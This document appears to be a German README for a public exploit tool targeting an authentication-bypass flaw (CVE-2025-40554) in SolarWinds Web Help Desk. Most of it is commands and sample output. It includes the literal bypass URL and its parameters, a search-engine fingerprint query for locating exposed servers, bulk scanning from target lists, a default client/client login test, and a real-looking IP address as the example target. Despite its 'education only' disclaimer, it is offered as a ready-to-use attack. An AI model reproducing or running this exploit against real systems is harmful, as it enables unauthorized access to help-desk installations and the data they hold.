
CVE-2025-40554 Exploitation
Ein umfassendes Sicherheitstesttool zur Erkennung und Ausnutzung der Authentifizierungsbypass-Schwachstelle (CVE-2025-40554 / CVE-2025-40536) in SolarWinds Web Help Desk.
NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS
Dieses Tool wird für Sicherheitsforschung, Penetrationstests und Schwachstellenbewertungen auf Systemen bereitgestellt, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
CVE-2025-40554 ist eine kritische Authentifizierungsbypass-Schwachstelle in SolarWinds Web Help Desk, die es nicht authentifizierten Angreifern ermöglicht:
Überzeugen Sie sich selbst :))
Abhängigkeiten:
# Skript herunterladen
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py
# Ausführbar machen
chmod +x CVE-2025-40554.py
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")
# Einfache Schwachstellenprüfung
python3 CVE-2025-40554.py -t https://ziel:8443
# Mit explizitem Protokoll
python3 CVE-2025-40554.py -t https://203.106.221.203:8443
# Vollständige Ausnutzung mit Session-Enumeration
python3 CVE-2025-40554.py -t https://ziel:8443 --exploit
# Standard-Anmeldeinformationen-Test überspringen
python3 CVE-2025-40554.py -t https://ziel:8443 --exploit --no-login
# Mehrere Ziele aus einer Datei scannen
python3 CVE-2025-40554.py -l targets.txt
# Bulk-Scan mit Exploit
python3 CVE-2025-40554.py -l targets.txt --exploit
# Ruhiger Modus (minimale Ausgabe)
python3 CVE-2025-40554.py -l targets.txt -q
# Benutzerdefinierte Ausgabedatei
python3 CVE-2025-40554.py -l targets.txt -o ergebnisse.txt
targets.txt:
https://ziel1:8443
https://ziel2.beispiel.com:8443
192.168.1.100:8443
ziel3.local:8443
# Kommentare werden unterstützt
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2025-40554 - SolarWinds Web Help Desk ║
║ Authentifizierungsbypass-Exploitationstool ║
║ Nur für Forschungs- & Bildungszwecke ║
╚═══════════════════════════════════════════════════════════════════╝
======================================================================
Ziel: https://203.106.221.203:8443
======================================================================
[*] Schritt 1: Session aufbauen...
[+] WOSID extrahiert: AbCdEfGhIjKlMnOpQrStU
[+] XSRF-Token: abc123-def456-ghi789
[*] Schritt 2: Authentifizierungsbypass testen...
[+] Bypass-Indikatoren gefunden: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] ANFÄLLIG - Auth-Bypass bestätigt!
[*] Schritt 3: Standard-Anmeldeinformationen testen (client/client)...
[+] ERFOLG - Standard-Anmeldeinformationen funktionieren!
======================================================================
EXPLOIT-MODUS - CVE-2025-40554 Auth-Bypass
======================================================================
[*] Bypass-URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Authentifizierungsbypass auslösen...
[+] Auth-Bypass erfolgreich!
[*] Session-Cookies:
wosid = AbCdEfGhIjKlMnOpQrStU
XSRF-TOKEN = abc123-def456-ghi789
======================================================================
ZUSAMMENFASSUNG
======================================================================
[+] Ziel ist ANFÄLLIG für CVE-2025-40554
[+] Standard-Anmeldeinformationen: FUNKTIONIEREN
======================================================================
[*] 5 eindeutige Ziele aus targets.txt geladen
[*] Modus: Bypass + Standard-Anmeldeinformationen-Test
[*] Vollständiger Exploit aktiviert
[1/5] Teste https://ziel1:8443
[+] ANFÄLLIG - Auth-Bypass bestätigt!
[+] ERFOLG - Standard-Anmeldeinformationen funktionieren!
[2/5] Teste https://ziel2:8443
[!] NICHT ANFÄLLIG - Auth-Bypass fehlgeschlagen
...
======================================================================
SCAN-ZUSAMMENFASSUNG
======================================================================
Insgesamt gescannt: 5/5
Anfällig: 2
Mit Standard-Anmeld: 1
======================================================================
[+] Ergebnisse gespeichert in: vulnerable_targets.txt
Session-Aufbau
Authentifizierungsbypass
Anmeldeinformationen-Test (optional)
Vollständiger Exploit (--exploit-Modus)
Das Tool erkennt erfolgreichen Bypass durch Überprüfung von:
externalAuthContainer - Externe Auth-KonfigurationJSONRpcClient - API-Client-ExpositionSAML 2.0 - SSO-KonfigurationLoginPref - Login-PräferenzeinstellungenauthMode - Authentifizierungsmodus-EinstellungenBeiträge sind willkommen.....
Dieses Tool wird "wie besehen" ohne jegliche Gewährleistung bereitgestellt. Nutzung auf eigenes Risiko.
Skynoxk
Denken Sie daran: Hacken Sie immer ethisch und legal. Unbefugter Zugriff ist eine Straftat.
| Option | Beschreibung |
|---|
-t, --target URL | Einzelne Ziel-URL zum Testen |
-l, --list DATEI | Datei mit einer Liste von Zielen (eines pro Zeile) |
--exploit | Vollständigen Exploit-Modus mit Enumerierung aktivieren |
--no-login | Standard-Anmeldeinformationen-Test überspringen |
-o, --output DATEI | Ausgabedatei für anfällige Ziele (Standard: vulnerable_targets.txt) |
-q, --quiet | Minimaler Ausgabemodus (nützlich für Bulk-Scans) |